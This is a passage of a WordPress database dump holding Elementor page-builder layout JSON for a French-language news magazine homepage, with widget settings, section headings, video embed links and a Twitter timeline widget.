"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2375,763,'_elementor_version','0.4'),(2376,763,'_elementor_css','a:3:{s:4:\"time\";i:1509370612;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2377,764,'_elementor_edit_mode','builder');
INSERT INTO `wpstg0_postmeta` VALUES (2378,764,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#bf0204\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#